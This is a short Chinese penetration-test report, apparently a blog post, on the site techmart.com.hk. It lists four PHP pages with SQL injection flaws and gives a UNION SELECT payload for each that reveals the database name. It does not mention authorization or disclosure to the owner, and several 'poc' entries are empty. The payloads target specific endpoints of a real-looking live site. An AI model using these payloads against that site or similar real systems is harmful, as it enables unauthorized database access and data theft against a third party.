目录
目标站点
对目标站点 http://www.techmart.com.hk 进行渗透测试
测试结果
**漏洞类型:**SQL注入漏洞
**漏洞等级:**中危
**漏洞危害:**危害后端
漏洞位置:
- /Coating_Services/latest_news_detail.php?id=1
- /Coating_Services/product.php?id=1
- /Industrial_Machinery/latest_news_detail.php?id=10
- /Industrial_Machinery/product.php?id=1
漏洞复现:
- /Coating_Services/latest_news_detail.php?id=1:
- poc:
?id=-1 union select 1,2,3,database(),5,6--+
- poc:
- /Coating_Services/product.php?id=1:
- poc:
?id=-1 union select 1,2,3,4,5,database(),7,8,9--+
- poc:
- /Industrial_Machinery/latest_news_detail.php?id=10:
- poc:
?id=-1 union select 1,2,database(),4,5--+
- poc:
- /Industrial_Machinery/product.php?id=1:
- poc:
?id=-1 union select 1,2,3,4,5,database(),7,8,9,10--+
- poc:
欲将心事付瑶琴。知音少,弦断有谁听?